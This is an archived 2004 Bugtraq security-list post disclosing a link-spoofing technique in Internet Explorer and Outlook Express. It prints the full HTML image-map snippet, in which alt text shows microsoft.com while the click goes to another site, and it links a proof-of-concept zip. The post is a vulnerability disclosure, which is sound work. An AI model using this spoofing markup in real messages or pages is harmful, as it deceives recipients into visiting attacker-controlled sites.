DEEP SEA PHISHING: Internet Explorer / Outlook Express

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: DEEP SEA PHISHING: Internet Explorer / Outlook Express
From: "http-equiv@xxxxxxxxxx" <1@xxxxxxxxxxx>
Date: Mon, 10 May 2004 20:01:54 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: 1@xxxxxxxxxxx


Saturday, May 08, 2004

More silliness :

<A HREF=http://www.microsoft.com alt="http://www.microsoft.com";>
<IMG SRC="malware.gif" USEMAP="#malware" border=0
alt="http://www.microsoft.com";></A>
<map NAME="malware" alt="http://www.microsoft.com";>>
<area SHAPE=RECT COORDS="224,21" HREF="http://www.malware.com";
alt="http://www.microsoft.com";>
</MAP>

Notes:

Outlook 2003 has a bubble that correctly identifies it even with 
the alternative text

Working Example:

http://www.malware.com/pheeesh.zip


End Call

-- 
http://www.malware.com

Prev by Date: Re: a litle bypass with IE
Next by Date: Somebody exploiting (badly designed) yahoo service?
Previous by thread: Re: msxml3.dll Parsing Error Crashes Internet Explorer Remotely Upon Refresh
Next by thread: Somebody exploiting (badly designed) yahoo service?
Index(es):
- Date
- Thread